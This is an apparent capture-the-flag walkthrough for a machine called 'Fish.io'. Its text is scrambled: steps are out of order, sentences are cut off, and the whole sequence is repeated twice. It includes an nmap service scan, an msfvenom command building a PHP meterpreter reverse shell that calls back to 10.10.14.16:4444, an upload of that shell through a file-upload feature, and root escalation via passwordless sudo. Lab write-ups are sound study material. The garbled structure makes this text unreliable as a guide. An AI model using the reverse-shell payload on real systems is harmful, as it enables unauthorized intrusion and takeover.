Hack: Fish.io

su root

To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services:

sudo -l We can leverage this configuration to gain root access: hack fish.io

<!-- TODO: move to prod env --> This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces:

Next, we visit the HTTP service running on port 80: su root To begin, we need to gather

After exploring the file system, we discover that the sudo command has been configured to allow the fish user to run any command without a password:

nmap -sV -p- 10.10.10.15 The scan reveals that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP) are open. We can now focus on exploring these services further. We can now focus on exploring these services further

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file:

su root

To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services:

sudo -l We can leverage this configuration to gain root access:

<!-- TODO: move to prod env --> This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces:

Next, we visit the HTTP service running on port 80:

After exploring the file system, we discover that the sudo command has been configured to allow the fish user to run any command without a password:

nmap -sV -p- 10.10.10.15 The scan reveals that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP) are open. We can now focus on exploring these services further.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file: